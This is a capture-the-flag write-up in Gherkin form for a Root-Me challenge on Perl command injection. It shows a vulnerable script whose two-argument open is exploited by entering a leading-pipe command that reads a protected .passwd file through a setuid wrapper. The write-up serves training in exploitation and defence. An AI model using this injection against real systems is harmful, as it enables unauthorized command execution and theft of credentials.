## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    bash
    scripting
  User:
    bianfa
  Goal:
    Get the password from .passwd file

 Background:
   Hacker's software:
     | <Software name> | <Version>     |
     | Kali Linux      | 2020.3        |
     | Firefox         | 68.10.0esr    |
     | SSH             | OpenSSH_8.3p1 |

 Machine information:
   Given the challenge URL
   """
   https://www.root-me.org/en/Challenges/App-Script/Perl-Command-injection
   """
   When I open this URL with Firefox
   Then I see some credentials to access a machine via SSH
   And I enter by console in Kali with the credentials
   Then I see some info
   """
   ----------------

   Welcome on challenge02    /

   -----------------------------

   /tmp and /var/tmp are writeable
   ----------------
   """
   When I run 'ls -a'
   Then I see the following four files
   """
   ch7.pl .passwd setuid-wrapper setuid-wrapper.c
   """
   Given the code from 'ch7.pl'
   """
   #!/usr/bin/perl

   delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
   $ENV{'PATH'}='/bin:/usr/bin';

   use strict;
   use warnings;

   main();

   sub main {
    my ($file, $line) = @_;

    menu();
    prompt();

    while((my $file = <STDIN>)) {
     chomp $file;
     process_file($file);
     prompt();
    }
   }

   sub prompt {
    local $| = 1;
    print ">>> ";
   }

   sub menu {
    print "*************************\n";
    print "* Stat File Service    *\n";
    print "*************************\n";
   }

   sub check_read_access {
    my $f = shift;

    if(-f $f) {
     my $filemode = (stat($f))[2];
     return ($filemode & 4);
    }

    return 0;
   }

   sub process_file {
    my $file = shift;
    my $line;
    my ($line_count, $char_count, $word_count) = (0,0,0);

    $file =~ /(.+)/;
    $file = $1;
    if(!open(F, $file)) {
     die "[-] Can't open $file: $!\n";
    }

    while(($line = <F>)) {
     $line_count++;
     $char_count += length $line;
     $word_count += scalar(split/\W+/, $line);
    }

    print "~~~ Statistics for \"$file\" ~~~\n";
    print "Lines: $line_count\n";
    print "Words: $word_count\n";
    print "Chars: $char_count\n";

    close F;
   }
   """
   Then I think the vulnerability may be in 'STDIN' or in 'open'
   When I consulting about the two
   Then I find that 'open' function has a vulnerability of command injection
   And I find that this vulnerability has CVE whit id: CVE-2001-0231

 Scenario: Fail:Attempt-use-pipe-at-the-end
   When I run '~/setuid-wrapper'
   Then I see the following
   """
   *************************
   * Stat File Service    *
   *************************
   >>>
   """
   And I enter the following line
   """
   .passwd
   """
   Then I get
   """
   ~~~ Statistics for ".passwd" ~~~
   Lines: 1
   Words: 1
   Chars: 28
   >>>
   """
   When I run '~/setuid-wrapper' again
   Then I enter the following line
   """
   perl -e 'open(F, ".passwd"); my $flag = <F>; print $flag' |
   """
   And I get
   """
   ~~~ Statistics for
   "perl -e 'open(F, ".passwd"); my $flag = <F>; print $flag' |" ~~~
   Lines: 1
   Words: 1
   Chars: 28
   >>>
   """
   Then I see the above statistics are the same from the '.passw' file
   And I don't get the flag but I do get a clue

 Scenario: Success:use-pipe-at-the-start
   When I see the clue
   Then I decide use the pipe at the start
   When I run '~/setuid-wrapper' again
   Then I enter the following line
   """
   | perl -e 'open(F, ".passwd"); my $flag = <F>; print $flag'
   """
   And I get the flag
   """
   ~~~ Statistics for
   "| perl -e 'open(F, ".passwd"); my $flag = <F>; print $flag'" ~~~
   Lines: 0
   Words: 0
   Chars: 0
   <flag>
   >>>
   """
